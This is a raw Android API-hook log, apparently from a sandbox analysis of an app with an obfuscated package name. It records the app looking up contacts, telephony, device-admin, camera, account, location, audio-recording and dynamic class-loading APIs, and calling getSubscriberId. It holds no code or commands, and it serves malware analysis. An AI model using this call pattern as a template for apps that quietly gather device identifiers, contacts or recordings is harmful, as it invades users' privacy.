D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.net.HttpURLConnection]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.okhttp.internal.http.HttpURLConnectionImpl]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.net.Socket]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.telephony.TelephonyManager]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.os.Debug]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.hardware.SensorManager]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.res.ResourcesKey]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.ResourcesManager]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/app/ouepxayhr.efutel-1/base.apk]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/ouepxayhr.efutel]
D/S4URC   ( 3753): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/ouepxayhr.efutel/cache]
D/S4URC   ( 3753): [SDK] [java.io.File] [mkdirs] [FilePath][String] [/data/data/ouepxayhr.efutel/cache]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/ouepxayhr.efutel/cache]
D/S4URC   ( 3753): [SDK] [android.app.Activity][onCrate] [Class][ComponentInfo{ouepxayhr.efutel/ouepxayhr.efutel.xrbxlua}]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.String]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [[Ljava.lang.String;]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Integer]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Long]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Boolean]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Character]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.Context]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.util.Vector]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Thread]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Runnable]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.net.Uri]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.os.Parcelable]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [[B]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.CharSequence]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.util.ArrayList]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.webkit.WebView]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.Activity]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.Intent]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.view.Menu]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.view.MenuItem]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.view.MenuInflater]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.AlarmManager]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.PendingIntent]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.io.OutputStream]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.io.DataOutputStream]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.io.FileInputStream]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.io.FileOutputStream]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.io.StringReader]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [org.apache.http.client.HttpClient]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [org.apache.http.impl.client.DefaultHttpClient]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [org.apache.http.client.methods.HttpPost]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [org.apache.http.params.HttpConnectionParams]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [org.apache.http.params.HttpParams]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.util.Calendar]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.text.SimpleDateFormat]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.util.TimeZone]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [org.apache.http.HttpEntity]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [org.apache.http.client.methods.HttpUriRequest]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [org.apache.http.client.ResponseHandler]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.view.View]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.Notification]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.ContentResolver]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.net.URL]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.provider.ContactsContract$Contacts]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.provider.ContactsContract$CommonDataKinds$Phone]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.os.Build]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.os.Build$VERSION]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.webkit.WebViewClient]
D/S4URC   ( 3753): [SDK] [android.app.ApplicationPackageManager] [getPackageInfo] [FindPackageName][String] [com.google.android.webview]
D/S4URC   ( 3753): [SDK] [android.app.ApplicationPackageManager] [getApplicationInfo] [FindApplicationName][String] [com.android.webview]
D/S4URC   ( 3753): [SDK] [android.app.ApplicationPackageManager] [getPackageInfo] [FindPackageName][String] [com.google.android.webview]
D/S4URC   ( 3753): [SDK] [android.app.ApplicationPackageManager] [getPackageInfo] [FindPackageName][String] [com.android.webview]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/data/com.android.webview]
D/S4URC   ( 3753): [SDK] [dalvik.system.BaseDexClassLoader] [Constructor] [DexPath][String] [/system/app/webview/webview.apk] [NDKPath][String] [/system/app/webview/lib/arm]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/system/app/webview/webview.apk]
D/S4URC   ( 3753): [SDK] [java.io.File] [getName] [FilePath][String] [/system/app/webview/webview.apk]
D/S4URC   ( 3753): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/system/app/webview/webview.apk]
D/S4URC   ( 3753): [SDK] [java.io.File] [isFile] [FilePath][String] [/system/app/webview/webview.apk]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/system/app/webview/webview.apk]
D/S4URC   ( 3753): [SDK] [dalvik.system.DexFile] [openDexFile] [DexPath][String] [/system/app/webview/webview.apk]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/system/app/webview/webview.apk]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/system/app/webview/lib/arm]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/vendor/lib]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/system/lib]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [net.sqlcipher.database.SQLiteDatabase]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [net.sqlcipher.database$SQLiteDatabase]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [net.sqlcipher$database$SQLiteDatabase]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [net$sqlcipher$database$SQLiteDatabase]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [[I]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [[I]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl.EditorImpl]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl$EditorImpl]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl.EditorImpl]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl$EditorImpl]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [[Z]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [[F]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [[I]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [[J]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl.EditorImpl]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl$EditorImpl]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl.EditorImpl]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl$EditorImpl]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [[Z]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl.EditorImpl]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl$EditorImpl]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [[I]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl.EditorImpl]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl$EditorImpl]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [[J]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl.EditorImpl]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl$EditorImpl]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [[F]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.admin.DevicePolicyManager]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.Activity]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.Intent]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.os.Environment]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.ContentResolver]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.os.Process]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.hardware.Camera]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.accounts.AccountManager]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.location.Location]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.webkit.WebView]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.media.MediaRecorder]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.Intent]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [dalvik.system.BaseDexClassLoader]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [dalvik.system.DexFile]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [dalvik.system.DexClassLoader]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.ApplicationPackageManager]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.ActivityManager]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Runtime]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Class]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.net.HttpURLConnection]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.okhttp.internal.http.HttpURLConnectionImpl]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.net.Socket]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.telephony.TelephonyManager]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.os.Debug]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.hardware.SensorManager]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/system/app/webview/webview.apk]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.webview.chromium.WebViewChromiumFactoryProvider]
D/S4URC   ( 3753): [SDK] [java.lang.Runtime] [loadLibrary] [SoPath][String] [webviewchromium]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/system/app/webview/lib/arm]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/system/app/webview/lib/arm/libwebviewchromium.so]
D/S4URC   ( 3753): [SDK] [java.lang.Runtime] [loadLibrary] [SoPath][String] [webviewchromium_plat_support]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/system/app/webview/lib/arm]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/system/app/webview/lib/arm/libwebviewchromium_plat_support.so]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/vendor/lib]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/vendor/lib/libwebviewchromium_plat_support.so]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/system/lib]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/system/lib/libwebviewchromium_plat_support.so]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/ouepxayhr.efutel]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/ouepxayhr.efutel/shared_prefs]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/ouepxayhr.efutel/shared_prefs/WebViewChromiumPrefs.xml]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/data/ouepxayhr.efutel/shared_prefs/WebViewChromiumPrefs.xml.bak]
D/S4URC   ( 3753): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/ouepxayhr.efutel/shared_prefs/WebViewChromiumPrefs.xml]
D/S4URC   ( 3753): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][WebViewChromiumPrefs.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3753): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/ouepxayhr.efutel/shared_prefs/WebViewChromiumPrefs.xml.bak]
D/S4URC   ( 3753): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/ouepxayhr.efutel/shared_prefs/WebViewChromiumPrefs.xml]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/ouepxayhr.efutel/shared_prefs/WebViewChromiumPrefs.xml]
D/S4URC   ( 3753): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][WebViewChromiumPrefs.xml] [MODE][MODE_PRIVATE] [Method][getInt] [Int][lastVersionCodeUsed] [Return][0]
D/S4URC   ( 3753): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][WebViewChromiumPrefs.xml] [MODE][MODE_PRIVATE] [Method][putInt] [Key][lastVersionCodeUsed] [Value][300001]
D/S4URC   ( 3753): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][WebViewChromiumPrefs.xml] [MODE][MODE_PRIVATE] [Method][apply]
D/S4URC   ( 3753): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/ouepxayhr.efutel/shared_prefs/WebViewChromiumPrefs.xml]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/ouepxayhr.efutel/shared_prefs/WebViewChromiumPrefs.xml]
D/S4URC   ( 3753): [SDK] [java.io.File] [getParent] [FilePath][String] [/data/data/ouepxayhr.efutel/shared_prefs/WebViewChromiumPrefs.xml]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/data/ouepxayhr.efutel/shared_prefs]
D/S4URC   ( 3753): [SDK] [java.io.File] [mkdir] [FilePath][String] [/data/data/ouepxayhr.efutel/shared_prefs]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/ouepxayhr.efutel/shared_prefs]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/ouepxayhr.efutel/shared_prefs/WebViewChromiumPrefs.xml]
D/S4URC   ( 3753): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/ouepxayhr.efutel/shared_prefs/WebViewChromiumPrefs.xml.bak]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/ouepxayhr.efutel]
D/S4URC   ( 3753): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/ouepxayhr.efutel/app_webview]
D/S4URC   ( 3753): [SDK] [java.io.File] [mkdir] [FilePath][String] [/data/data/ouepxayhr.efutel/app_webview]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/ouepxayhr.efutel/app_webview]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.os.Message]
D/S4URC   ( 3753): [SDK] [android.content.ContextWrapper] [registerReceiver][IntentFilter][android.intent.action.HEADSET_PLUG,
D/S4URC   ( 3753): [SDK] [android.app.ApplicationPackageManager] [getPackageInfo] [FindPackageName][String] [ouepxayhr.efutel]
D/S4URC   ( 3753): [SDK] [android.app.ApplicationPackageManager] [getApplicationInfo] [FindApplicationName][String] [ouepxayhr.efutel]
D/S4URC   ( 3753): [SDK] [android.content.ContextWrapper] [registerReceiver][IntentFilter][android.intent.action.TIMEZONE_CHANGED,
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/ouepxayhr.efutel]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/ouepxayhr.efutel/databases]
D/S4URC   ( 3753): [SDK] [android.content.ContextWrapper] [getDatabasePath] [PathInfo][String] [foo]
D/S4URC   ( 3753): [SDK] [java.io.File] [getParent] [FilePath][String] [/data/data/ouepxayhr.efutel/databases/foo]
D/S4URC   ( 3753): [SDK] [android.content.ContextWrapper] [registerReceiver][IntentFilter][android.intent.action.PROXY_CHANGE,
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.os.Message]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.IntentFilter]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.BroadcastReceiver]
D/S4URC   ( 3753): [SDK] [android.content.ContextWrapper] [registerReceiver][IntentFilter][android.intent.action.BATTERY_CHANGED,
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.telephony.TelephonyManager]
D/S4URC   ( 3753): [SDK] [android.telephony.TelephonyManager] [getSubscriberId]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.telephony.TelephonyManager]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.io.InputStream]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Class]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/app/ouepxayhr.efutel-1/base.apk]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/app/ouepxayhr.efutel-1/base.apk]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/app/ouepxayhr.efutel-1/base.apk]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/app/ouepxayhr.efutel-1/base.apk]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/app/ouepxayhr.efutel-1/base.apk]
D/S4URC   ( 3753): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/data/app/ouepxayhr.efutel-1/base.apk]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/app/ouepxayhr.efutel-1/base.apk]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/app/ouepxayhr.efutel-1/base.apk]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/app/ouepxayhr.efutel-1/base.apk]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/app/ouepxayhr.efutel-1/base.apk]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.OpenSSLSignature$SHA1RSA]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.OpenSSLMessageDigestJDK$SHA1]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
